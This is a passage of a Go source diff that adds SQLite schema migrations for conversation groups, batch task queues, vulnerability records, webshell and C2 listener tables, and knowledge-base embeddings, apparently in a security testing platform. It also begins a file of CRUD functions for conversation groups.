COLUMN agent_mode TEXT NOT NULL DEFAULT 'eino_single'"); err != nil { + db.logger.Warn("添加agent_mode字段失败", zap.Error(err)) + } + } + + return nil +} + +// migrateConversationGroupsTable 迁移conversation_groups表,添加新字段 +func (db *DB) migrateConversationGroupsTable() error { + // 检查pinned字段是否存在 + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('conversation_groups') WHERE name='pinned'").Scan(&count) + if err != nil { + // 如果查询失败,尝试添加字段 + if _, addErr := db.Exec("ALTER TABLE conversation_groups ADD COLUMN pinned INTEGER DEFAULT 0"); addErr != nil { + // 如果字段已存在,忽略错误 + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加pinned字段失败", zap.Error(addErr)) + } + } + } else if count == 0 { + // 字段不存在,添加它 + if _, err := db.Exec("ALTER TABLE conversation_groups ADD COLUMN pinned INTEGER DEFAULT 0"); err != nil { + db.logger.Warn("添加pinned字段失败", zap.Error(err)) + } + } + + return nil +} + +// migrateConversationGroupMappingsTable 迁移conversation_group_mappings表,添加新字段 +func (db *DB) migrateConversationGroupMappingsTable() error { + // 检查pinned字段是否存在 + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('conversation_group_mappings') WHERE name='pinned'").Scan(&count) + if err != nil { + // 如果查询失败,尝试添加字段 + if _, addErr := db.Exec("ALTER TABLE conversation_group_mappings ADD COLUMN pinned INTEGER DEFAULT 0"); addErr != nil { + // 如果字段已存在,忽略错误 + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加pinned字段失败", zap.Error(addErr)) + } + } + } else if count == 0 { + // 字段不存在,添加它 + if _, err := db.Exec("ALTER TABLE conversation_group_mappings ADD COLUMN pinned INTEGER DEFAULT 0"); err != nil { + db.logger.Warn("添加pinned字段失败", zap.Error(err)) + } + } + + return nil +} + +// migrateBatchTaskQueuesTable 迁移batch_task_queues表,补充新字段 +func (db *DB) migrateBatchTaskQueuesTable() error { + // 检查title字段是否存在 + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='title'").Scan(&count) + if err != nil { + // 如果查询失败,尝试添加字段 + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN title TEXT"); addErr != nil { + // 如果字段已存在,忽略错误 + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加title字段失败", zap.Error(addErr)) + } + } + } else if count == 0 { + // 字段不存在,添加它 + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN title TEXT"); err != nil { + db.logger.Warn("添加title字段失败", zap.Error(err)) + } + } + + // 检查role字段是否存在 + var roleCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='role'").Scan(&roleCount) + if err != nil { + // 如果查询失败,尝试添加字段 + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN role TEXT"); addErr != nil { + // 如果字段已存在,忽略错误 + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加role字段失败", zap.Error(addErr)) + } + } + } else if roleCount == 0 { + // 字段不存在,添加它 + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN role TEXT"); err != nil { + db.logger.Warn("添加role字段失败", zap.Error(err)) + } + } + + // 检查agent_mode字段是否存在 + var agentModeCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='agent_mode'").Scan(&agentModeCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN agent_mode TEXT NOT NULL DEFAULT 'eino_single'"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加agent_mode字段失败", zap.Error(addErr)) + } + } + } else if agentModeCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN agent_mode TEXT NOT NULL DEFAULT 'eino_single'"); err != nil { + db.logger.Warn("添加agent_mode字段失败", zap.Error(err)) + } + } + + // 检查schedule_mode字段是否存在 + var scheduleModeCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='schedule_mode'").Scan(&scheduleModeCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN schedule_mode TEXT NOT NULL DEFAULT 'manual'"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加schedule_mode字段失败", zap.Error(addErr)) + } + } + } else if scheduleModeCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN schedule_mode TEXT NOT NULL DEFAULT 'manual'"); err != nil { + db.logger.Warn("添加schedule_mode字段失败", zap.Error(err)) + } + } + + // 检查cron_expr字段是否存在 + var cronExprCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='cron_expr'").Scan(&cronExprCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN cron_expr TEXT"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加cron_expr字段失败", zap.Error(addErr)) + } + } + } else if cronExprCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN cron_expr TEXT"); err != nil { + db.logger.Warn("添加cron_expr字段失败", zap.Error(err)) + } + } + + // 检查next_run_at字段是否存在 + var nextRunAtCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='next_run_at'").Scan(&nextRunAtCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN next_run_at DATETIME"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加next_run_at字段失败", zap.Error(addErr)) + } + } + } else if nextRunAtCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN next_run_at DATETIME"); err != nil { + db.logger.Warn("添加next_run_at字段失败", zap.Error(err)) + } + } + + // schedule_enabled:0=暂停 Cron 自动调度,1=允许(手工执行不受影响) + var scheduleEnCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='schedule_enabled'").Scan(&scheduleEnCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN schedule_enabled INTEGER NOT NULL DEFAULT 1"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加schedule_enabled字段失败", zap.Error(addErr)) + } + } + } else if scheduleEnCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN schedule_enabled INTEGER NOT NULL DEFAULT 1"); err != nil { + db.logger.Warn("添加schedule_enabled字段失败", zap.Error(err)) + } + } + + var lastTrigCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='last_schedule_trigger_at'").Scan(&lastTrigCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN last_schedule_trigger_at DATETIME"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加last_schedule_trigger_at字段失败", zap.Error(addErr)) + } + } + } else if lastTrigCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN last_schedule_trigger_at DATETIME"); err != nil { + db.logger.Warn("添加last_schedule_trigger_at字段失败", zap.Error(err)) + } + } + + var lastSchedErrCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='last_schedule_error'").Scan(&lastSchedErrCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN last_schedule_error TEXT"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加last_schedule_error字段失败", zap.Error(addErr)) + } + } + } else if lastSchedErrCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN last_schedule_error TEXT"); err != nil { + db.logger.Warn("添加last_schedule_error字段失败", zap.Error(err)) + } + } + + var lastRunErrCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='last_run_error'").Scan(&lastRunErrCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN last_run_error TEXT"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加last_run_error字段失败", zap.Error(addErr)) + } + } + } else if lastRunErrCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN last_run_error TEXT"); err != nil { + db.logger.Warn("添加last_run_error字段失败", zap.Error(err)) + } + } + + var projectIDCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='project_id'").Scan(&projectIDCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN project_id TEXT"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加batch_task_queues.project_id字段失败", zap.Error(addErr)) + } + } + } else if projectIDCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN project_id TEXT"); err != nil { + db.logger.Warn("添加batch_task_queues.project_id字段失败", zap.Error(err)) + } + } + + var concurrencyCount int + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('batch_task_queues') WHERE name='concurrency'").Scan(&concurrencyCount) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN concurrency INTEGER NOT NULL DEFAULT 1"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加batch_task_queues.concurrency字段失败", zap.Error(addErr)) + } + } + } else if concurrencyCount == 0 { + if _, err := db.Exec("ALTER TABLE batch_task_queues ADD COLUMN concurrency INTEGER NOT NULL DEFAULT 1"); err != nil { + db.logger.Warn("添加batch_task_queues.concurrency字段失败", zap.Error(err)) + } + } + + return nil +} + +// migrateProjectsTable 迁移 projects / conversations / vulnerabilities 的项目关联字段。 +func (db *DB) migrateProjectsTable() error { + for _, col := range []struct { + table string + name string + stmt string + }{ + {"conversations", "project_id", "ALTER TABLE conversations ADD COLUMN project_id TEXT REFERENCES projects(id) ON DELETE SET NULL"}, + {"vulnerabilities", "project_id", "ALTER TABLE vulnerabilities ADD COLUMN project_id TEXT"}, + } { + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info(?) WHERE name=?", col.table, col.name).Scan(&count) + if err != nil { + if _, addErr := db.Exec(col.stmt); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加字段失败", zap.String("table", col.table), zap.String("field", col.name), zap.Error(addErr)) + } + } + continue + } + if count == 0 { + if _, addErr := db.Exec(col.stmt); addErr != nil { + db.logger.Warn("添加字段失败", zap.String("table", col.table), zap.String("field", col.name), zap.Error(addErr)) + } + } + } + return nil +} + +// dropProjectFactVersionsTable 移除已废弃的事实版本归档表。 +func (db *DB) dropProjectFactVersionsTable() error { + _, err := db.Exec(`DROP TABLE IF EXISTS project_fact_versions`) + return err +} + +// migrateVulnerabilitiesConversationFK 将 vulnerabilities.conversation_id 外键改为 ON DELETE SET NULL,删除对话时保留漏洞记录。 +func (db *DB) migrateVulnerabilitiesConversationFK() error { + ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB) + if err != nil { + return err + } + if ok { + return nil + } + + tx, err := db.Begin() + if err != nil { + return fmt.Errorf("开启事务失败: %w", err) + } + defer func() { _ = tx.Rollback() }() + + const createNew = ` + CREATE TABLE vulnerabilities_new ( + id TEXT PRIMARY KEY, + conversation_id TEXT, + conversation_tag TEXT, + task_tag TEXT, + title TEXT NOT NULL, + description TEXT, + severity TEXT NOT NULL, + status TEXT NOT NULL DEFAULT 'open', + vulnerability_type TEXT, + target TEXT, + preconditions TEXT, + reproduction_steps TEXT, + evidence TEXT, + impact TEXT, + recommendation TEXT, + retest_notes TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + project_id TEXT, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL + );` + if _, err := tx.Exec(createNew); err != nil { + return fmt.Errorf("创建 vulnerabilities_new 失败: %w", err) + } + + const copyRows = ` + INSERT INTO vulnerabilities_new ( + id, conversation_id, conversation_tag, task_tag, title, description, + severity, status, vulnerability_type, target, preconditions, reproduction_steps, + evidence, impact, recommendation, retest_notes, + created_at, updated_at, project_id + ) + SELECT + id, conversation_id, conversation_tag, task_tag, title, description, + severity, status, vulnerability_type, target, + COALESCE(preconditions, ''), COALESCE(reproduction_steps, ''), + COALESCE(evidence, ''), impact, recommendation, COALESCE(retest_notes, ''), + created_at, updated_at, project_id + FROM vulnerabilities;` + if _, err := tx.Exec(copyRows); err != nil { + return fmt.Errorf("复制 vulnerabilities 数据失败: %w", err) + } + if _, err := tx.Exec(`DROP TABLE vulnerabilities`); err != nil { + return fmt.Errorf("删除旧 vulnerabilities 表失败: %w", err) + } + if _, err := tx.Exec(`ALTER TABLE vulnerabilities_new RENAME TO vulnerabilities`); err != nil { + return fmt.Errorf("重命名 vulnerabilities 表失败: %w", err) + } + + indexes := []string{ + `CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_id ON vulnerabilities(conversation_id)`, + `CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_tag ON vulnerabilities(conversation_tag)`, + `CREATE INDEX IF NOT EXISTS idx_vulnerabilities_task_tag ON vulnerabilities(task_tag)`, + `CREATE INDEX IF NOT EXISTS idx_vulnerabilities_severity ON vulnerabilities(severity)`, + `CREATE INDEX IF NOT EXISTS idx_vulnerabilities_status ON vulnerabilities(status)`, + `CREATE INDEX IF NOT EXISTS idx_vulnerabilities_created_at ON vulnerabilities(created_at)`, + `CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id)`, + } + for _, stmt := range indexes { + if _, err := tx.Exec(stmt); err != nil { + return fmt.Errorf("重建 vulnerabilities 索引失败: %w", err) + } + } + + if err := tx.Commit(); err != nil { + return fmt.Errorf("提交 vulnerabilities 外键迁移失败: %w", err) + } + db.logger.Info("vulnerabilities 表已迁移:删除对话时保留漏洞记录") + return nil +} + +func vulnerabilitiesConversationFKOnDeleteSetNull(db *sql.DB) (bool, error) { + rows, err := db.Query(`PRAGMA foreign_key_list(vulnerabilities)`) + if err != nil { + return false, err + } + defer rows.Close() + + found := false + for rows.Next() { + var id, seq int + var table, from, to, onUpdate, onDelete, match string + if err := rows.Scan(&id, &seq, &table, &from, &to, &onUpdate, &onDelete, &match); err != nil { + return false, err + } + if from == "conversation_id" { + found = true + if !strings.EqualFold(onDelete, "SET NULL") { + return false, nil + } + } + } + if err := rows.Err(); err != nil { + return false, err + } + return found, nil +} + +// migrateVulnerabilitiesTable 迁移 vulnerabilities 表,补充标签字段 +func (db *DB) migrateVulnerabilitiesTable() error { + columns := []struct { + name string + stmt string + }{ + {name: "conversation_tag", stmt: "ALTER TABLE vulnerabilities ADD COLUMN conversation_tag TEXT"}, + {name: "task_tag", stmt: "ALTER TABLE vulnerabilities ADD COLUMN task_tag TEXT"}, + {name: "project_id", stmt: "ALTER TABLE vulnerabilities ADD COLUMN project_id TEXT"}, + {name: "preconditions", stmt: "ALTER TABLE vulnerabilities ADD COLUMN preconditions TEXT"}, + {name: "reproduction_steps", stmt: "ALTER TABLE vulnerabilities ADD COLUMN reproduction_steps TEXT"}, + {name: "evidence", stmt: "ALTER TABLE vulnerabilities ADD COLUMN evidence TEXT"}, + {name: "retest_notes", stmt: "ALTER TABLE vulnerabilities ADD COLUMN retest_notes TEXT"}, + } + + for _, col := range columns { + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('vulnerabilities') WHERE name=?", col.name).Scan(&count) + if err != nil { + if _, addErr := db.Exec(col.stmt); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加vulnerabilities字段失败", zap.String("field", col.name), zap.Error(addErr)) + } + } + continue + } + if count == 0 { + if _, addErr := db.Exec(col.stmt); addErr != nil { + db.logger.Warn("添加vulnerabilities字段失败", zap.String("field", col.name), zap.Error(addErr)) + } + } + } + return nil +} + +// migrateWebshellConnectionsTable 迁移 webshell_connections 表,补充新字段 +func (db *DB) migrateWebshellConnectionsTable() error { + columns := []struct { + name string + stmt string + }{ + {name: "project_id", stmt: "ALTER TABLE webshell_connections ADD COLUMN project_id TEXT"}, + {name: "encoding", stmt: "ALTER TABLE webshell_connections ADD COLUMN encoding TEXT NOT NULL DEFAULT ''"}, + {name: "os", stmt: "ALTER TABLE webshell_connections ADD COLUMN os TEXT NOT NULL DEFAULT ''"}, + } + + for _, col := range columns { + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('webshell_connections') WHERE name=?", col.name).Scan(&count) + if err != nil { + if _, addErr := db.Exec(col.stmt); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加webshell_connections字段失败", zap.String("field", col.name), zap.Error(addErr)) + } + } + continue + } + if count == 0 { + if _, addErr := db.Exec(col.stmt); addErr != nil { + db.logger.Warn("添加webshell_connections字段失败", zap.String("field", col.name), zap.Error(addErr)) + } + } + } + return nil +} + +func (db *DB) migrateC2ListenersTable() error { + return db.addColumnIfMissing("c2_listeners", "project_id", "ALTER TABLE c2_listeners ADD COLUMN project_id TEXT") +} + +// NewKnowledgeDB 创建知识库数据库连接(只包含知识库相关的表) +func NewKnowledgeDB(dbPath string, logger *zap.Logger) (*DB, error) { + sqlDB, err := sql.Open("sqlite3", dbPath+"?_journal_mode=WAL&_foreign_keys=1&_busy_timeout=5000&_synchronous=NORMAL") + if err != nil { + return nil, fmt.Errorf("打开知识库数据库失败: %w", err) + } + + configureDBPool(sqlDB) + + if err := sqlDB.Ping(); err != nil { + _ = sqlDB.Close() + return nil, fmt.Errorf("连接知识库数据库失败: %w", err) + } + if err := configureSQLitePragmas(sqlDB); err != nil { + _ = sqlDB.Close() + return nil, fmt.Errorf("配置知识库数据库 PRAGMA 失败: %w", err) + } + + database := &DB{ + DB: sqlDB, + logger: logger, + } + + // 初始化知识库表 + if err := database.initKnowledgeTables(); err != nil { + _ = sqlDB.Close() + return nil, fmt.Errorf("初始化知识库表失败: %w", err) + } + database.startPassiveCheckpointLoop("knowledge") + + return database, nil +} + +// initKnowledgeTables 初始化知识库数据库表(只包含知识库相关的表) +func (db *DB) initKnowledgeTables() error { + // 创建知识库项表 + createKnowledgeBaseItemsTable := ` + CREATE TABLE IF NOT EXISTS knowledge_base_items ( + id TEXT PRIMARY KEY, + category TEXT NOT NULL, + title TEXT NOT NULL, + file_path TEXT NOT NULL, + content TEXT, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL + );` + + // 创建知识库向量表 + createKnowledgeEmbeddingsTable := ` + CREATE TABLE IF NOT EXISTS knowledge_embeddings ( + id TEXT PRIMARY KEY, + item_id TEXT NOT NULL, + chunk_index INTEGER NOT NULL, + chunk_text TEXT NOT NULL, + embedding TEXT NOT NULL, + sub_indexes TEXT NOT NULL DEFAULT '', + embedding_model TEXT NOT NULL DEFAULT '', + embedding_dim INTEGER NOT NULL DEFAULT 0, + created_at DATETIME NOT NULL, + FOREIGN KEY (item_id) REFERENCES knowledge_base_items(id) ON DELETE CASCADE + );` + + // 创建知识检索日志表(在独立知识库数据库中,不使用外键约束,因为conversations和messages表可能不在这个数据库中) + createKnowledgeRetrievalLogsTable := ` + CREATE TABLE IF NOT EXISTS knowledge_retrieval_logs ( + id TEXT PRIMARY KEY, + conversation_id TEXT, + message_id TEXT, + query TEXT NOT NULL, + risk_type TEXT, + retrieved_items TEXT, + created_at DATETIME NOT NULL + );` + + // 创建索引 + createIndexes := ` + CREATE INDEX IF NOT EXISTS idx_knowledge_items_category ON knowledge_base_items(category); + CREATE INDEX IF NOT EXISTS idx_knowledge_embeddings_item_id ON knowledge_embeddings(item_id); + CREATE INDEX IF NOT EXISTS idx_knowledge_retrieval_logs_conversation ON knowledge_retrieval_logs(conversation_id); + CREATE INDEX IF NOT EXISTS idx_knowledge_retrieval_logs_message ON knowledge_retrieval_logs(message_id); + CREATE INDEX IF NOT EXISTS idx_knowledge_retrieval_logs_created_at ON knowledge_retrieval_logs(created_at); + ` + + if _, err := db.Exec(createKnowledgeBaseItemsTable); err != nil { + return fmt.Errorf("创建knowledge_base_items表失败: %w", err) + } + + if _, err := db.Exec(createKnowledgeEmbeddingsTable); err != nil { + return fmt.Errorf("创建knowledge_embeddings表失败: %w", err) + } + + if _, err := db.Exec(createKnowledgeRetrievalLogsTable); err != nil { + return fmt.Errorf("创建knowledge_retrieval_logs表失败: %w", err) + } + + if _, err := db.Exec(createIndexes); err != nil { + return fmt.Errorf("创建索引失败: %w", err) + } + + if err := db.migrateKnowledgeEmbeddingsColumns(); err != nil { + return fmt.Errorf("迁移 knowledge_embeddings 列失败: %w", err) + } + + db.logger.Info("知识库数据库表初始化完成") + return nil +} + +// migrateKnowledgeEmbeddingsColumns 为已有库补充 sub_indexes、embedding_model、embedding_dim。 +func (db *DB) migrateKnowledgeEmbeddingsColumns() error { + var n int + if err := db.QueryRow(`SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='knowledge_embeddings'`).Scan(&n); err != nil { + return err + } + if n == 0 { + return nil + } + migrations := []struct { + col string + stmt string + }{ + {"sub_indexes", `ALTER TABLE knowledge_embeddings ADD COLUMN sub_indexes TEXT NOT NULL DEFAULT ''`}, + {"embedding_model", `ALTER TABLE knowledge_embeddings ADD COLUMN embedding_model TEXT NOT NULL DEFAULT ''`}, + {"embedding_dim", `ALTER TABLE knowledge_embeddings ADD COLUMN embedding_dim INTEGER NOT NULL DEFAULT 0`}, + } + for _, m := range migrations { + var colCount int + q := `SELECT COUNT(*) FROM pragma_table_info('knowledge_embeddings') WHERE name = ?` + if err := db.QueryRow(q, m.col).Scan(&colCount); err != nil { + return err + } + if colCount > 0 { + continue + } + if _, err := db.Exec(m.stmt); err != nil { + return err + } + } + return nil +} + +// Close 关闭数据库连接 +func (db *DB) Close() error { + if db == nil { + return nil + } + db.closeOnce.Do(func() { + if db.checkpointStop != nil { + close(db.checkpointStop) + if db.checkpointDone != nil { + <-db.checkpointDone + } + } + if db.DB != nil { + db.closeErr = db.DB.Close() + } + }) + return db.closeErr +} diff --git a/internal/database/group.go b/internal/database/group.go new file mode 100644 index 00000000..0739ded4 --- /dev/null +++ b/internal/database/group.go @@ -0,0 +1,486 @@ +package database + +import ( + "database/sql" + "fmt" + "time" + + "github.com/google/uuid" +) + +// ConversationGroup 对话分组 +type ConversationGroup struct { + ID string `json:"id"` + Name string `json:"name"` + Icon string `json:"icon"` + Pinned bool `json:"pinned"` + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` + OwnerUserID string `json:"-"` +} + +// GroupExistsByName 检查分组名称是否已存在 +func (db *DB) GroupExistsByName(name string, excludeID string) (bool, error) { + return db.groupExistsByNameForOwner(name, excludeID, "") +} + +func (db *DB) groupExistsByNameForOwner(name, excludeID, ownerUserID string) (bool, error) { + var count int + var err error + if ownerUserID != "" && excludeID != "" { + err = db.QueryRow("SELECT COUNT(*) FROM conversation_groups WHERE name = ? AND owner_user_id = ? AND id != ?", name, ownerUserID, excludeID).Scan(&count) + } else if ownerUserID != "" { + err = db.QueryRow("SELECT COUNT(*) FROM conversation_groups WHERE name = ? AND owner_user_id = ?", name, ownerUserID).Scan(&count) + } else if excludeID != "" { + err = db.QueryRow( + "SELECT COUNT(*) FROM conversation_groups WHERE name = ? AND id != ?", + name, excludeID, + ).Scan(&count) + } else { + err = db.QueryRow( + "SELECT COUNT(*) FROM conversation_groups WHERE name = ?", + name, + ).Scan(&count) + } + + if err != nil { + return false, fmt.Errorf("检查分组名称失败: %w", err) + } + + return count > 0, nil +} + +// CreateGroup 创建分组 +func (db *DB) CreateGroup(name, icon string, owners ...string) (*ConversationGroup, error) { + ownerUserID := "" + if len(owners) > 0 { + ownerUserID = owners[0] + } + // 检查名称是否已存在 + exists, err := db.groupExistsByNameForOwner(name, "", ownerUserID) + if err != nil { + return nil, err + } + if exists { + return nil, fmt.Errorf("分组名称已存在") + } + + id := uuid.New().String() + now := time.Now() + + if icon == "" { + icon = "📁" + } + + _, err = db.Exec( + "INSERT INTO conversation_groups (id, name, icon, pinned, owner_user_id, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, name, icon, 0, ownerUserID, now, now, + ) + if err != nil { + return nil, fmt.Errorf("创建分组失败: %w", err) + } + + return &ConversationGroup{ + ID: id, + Name: name, + Icon: icon, + Pinned: false, + CreatedAt: now, + UpdatedAt: now, + OwnerUserID: ownerUserID, + }, nil +} + +// ListGroups 列出所有分组 +func (db *DB) ListGroups() ([]*ConversationGroup, error) { + return db.ListGroupsForAccess("", RBACScopeAll) +} + +func (db *DB) ListGroupsForAccess(userID, scope string) ([]*ConversationGroup, error) { + query := "SELECT id, name, icon, COALESCE(pinned, 0), COALESCE(owner_user_id, ''), created_at, updated_at FROM conversation_groups" + args := []interface{}{} + if scope != RBACScopeAll { + query += " WHERE owner_user_id = ?" + args = append(args, userID) + } + query += " ORDER BY COALESCE(pinned, 0) DESC, created_at ASC" + rows, err := db.Query( + query, args..., + ) + if err != nil { + return nil, fmt.Errorf("查询分组列表失败: %w", err) + } + defer rows.Close() + + var groups []*ConversationGroup + for rows.Next() { + var group ConversationGroup + var createdAt, updatedAt string + var pinned int + + if err := rows.Scan(&group.ID, &group.Name, &group.Icon, &pinned, &group.OwnerUserID, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描分组失败: %w", err) + } + + group.Pinned = pinned != 0 + + // 尝试多种时间格式解析 + var err1, err2 error + group.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err1 != nil { + group.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err1 != nil { + group.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + group.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt) + if err2 != nil { + group.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt) + } + if err2 != nil { + group.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + + groups = append(groups, &group) + } + + return groups, nil +} + +// GetGroup 获取分组 +func (db *DB) GetGroup(id string) (*ConversationGroup, error) { + var group ConversationGroup + var createdAt, updatedAt string + var pinned int + + err := db.QueryRow( + "SELECT id, name, icon, COALESCE(pinned, 0), COALESCE(owner_user_id, ''), created_at, updated_at FROM conversation_groups WHERE id = ?", + id, + ).Scan(&group.ID, &group.Name, &group.Icon, &pinned, &group.OwnerUserID, &createdAt, &updatedAt) + if err != nil { + if err == sql.ErrNoRows { + return nil, fmt.Errorf("分组不存在") + } + return nil, fmt.Errorf("查询分组失败: %w", err) + } + + // 尝试多种时间格式解析 + var err1, err2 error + group.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err1 != nil { + group.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err1 != nil { + group.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + group.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt) + if err2 != nil { + group.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt) + } + if err2 != nil { + group.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + + group.Pinned = pinned != 0 + + return &group, nil +} + +func (db *DB) UserCanAccessGroup(userID, scope, groupID string) bool { + if scope == RBACScopeAll { + return true + } + var count int + err := db.QueryRow(`SELECT COUNT(*) FROM conversation_groups WHERE id = ? AND owner_user_id = ?`, groupID, userID).Scan(&count) + return err == nil && count > 0 +} + +// UpdateGroup 更新分组 +func (db *DB) UpdateGroup(id, name, icon string) error { + existing, err := db.GetGroup(id) + if err != nil { + return err + } + // 检查名称是否已存在(排除当前分组) + exists, err := db.groupExistsByNameForOwner(name, id, existing.OwnerUserID) + if err != nil { + return err + } + if exists { + return fmt.Errorf("分组名称已存在") + } + + _, err = db.Exec( + "UPDATE conversation_groups SET name = ?, icon = ?, updated_at = 